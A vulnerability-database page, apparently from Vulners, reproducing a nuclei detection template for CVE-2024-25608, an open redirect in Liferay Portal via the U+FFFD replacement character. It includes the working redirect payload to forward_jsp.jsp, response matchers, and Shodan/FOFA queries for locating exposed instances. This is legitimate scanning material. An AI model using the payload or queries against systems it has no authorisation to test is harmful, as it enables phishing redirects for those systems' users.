Lucene search
K

Liferay Portal - Open Redirect

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

Liferay Portal open redirect via HtmlUtil.escapeRedirect using U+FFFD to redirect to arbitrary URLs.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-25608
20 Feb 202411:26
circl
CNNVD
Liferay Portal and Liferay DXP Security Vulnerabilities
20 Feb 202400:00
cnnvd
CVE
CVE-2024-25608
20 Feb 202409:26
cve
Cvelist
CVE-2024-25608
20 Feb 202409:26
cvelist
EUVD
EUVD-2024-22931
3 Oct 202520:07
euvd
Github Security Blog
Liferay Portal and Liferay DXP's HtmlUtil.escapeRedirect Can Be Circumvented via Replacement Character
20 Feb 202412:31
github
NVD
CVE-2024-25608
20 Feb 202410:15
nvd
OSV
CVE-2024-25608
20 Feb 202410:15
osv
OSV
GHSA-548X-J6X6-HCV4 Liferay Portal and Liferay DXP's HtmlUtil.escapeRedirect Can Be Circumvented via Replacement Character
20 Feb 202412:31
osv
Prion
Design/Logic Flaw
20 Feb 202410:15
prion
Rows per page
id: CVE-2024-25608

info:
  name: Liferay Portal - Open Redirect
  author: daffainfo
  severity: medium
  description: |
    HtmlUtil.escapeRedirect in Liferay Portal 7.2.0 through 7.4.3.18, and older unsupported versions, and Liferay DXP 7.4 before update 19, 7.3 before update 4, 7.2 before fix pack 19, and older unsupported versions can be circumvented by using the 'REPLACEMENT CHARACTER' (U+FFFD), which allows remote attackers to redirect users to arbitrary external URLs via the (1) 'redirect` parameter (2) `FORWARD_URL` parameter, (3) `noSuchEntryRedirect` parameter, and (4) others parameters that rely on HtmlUtil.escapeRedirect.
  impact: |
    Attackers can redirect users to arbitrary external URLs, potentially leading to phishing or malware distribution.
  remediation: |
    Update to the latest supported versions of Liferay Portal and DXP, applying all security patches.
  reference:
    - https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25608
    - https://github.com/liferay/liferay-portal/commit/aea651fa5110934b6a00d93391fac87985e27786
    - https://github.com/liferay/liferay-portal/commit/36adf82ef7a09c7035d4f19a1982dcde1ae3f6ae
    - https://nvd.nist.gov/vuln/detail/CVE-2024-25608
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-25608
    epss-score: 0.0096
    epss-percentile: 0.57251
    cwe-id: CWE-601
    cpe: cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*,cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: liferay
    product: digital_experience_platform,liferay_portal
    shodan-query: http.favicon.hash:129457226
    fofa-query: icon_hash=129457226
  tags: cve,cve2024,liferay,liferay-portal,digital-experience-platform,open-redirect,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/html/common/forward_jsp.jsp?FORWARD_URL=http://oast.me%EF%BF%BD@localhost"

    matchers-condition: and
    matchers:
      - type: word
        part: location
        words:
          - 'http://oast.me?@localhost'

      - type: status
        status:
          - 302
# digest: 4a0a004730450220410916c0f83acdd12fa6f7456cf84859a6b25acebd0cd7618731dd44ded2af50022100a7aebbb3912eb0548f2a992035ccaa560b0c0521e83ad70c446325b5490d2bea:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 3.16.1
EPSS0.0096
SSVC
15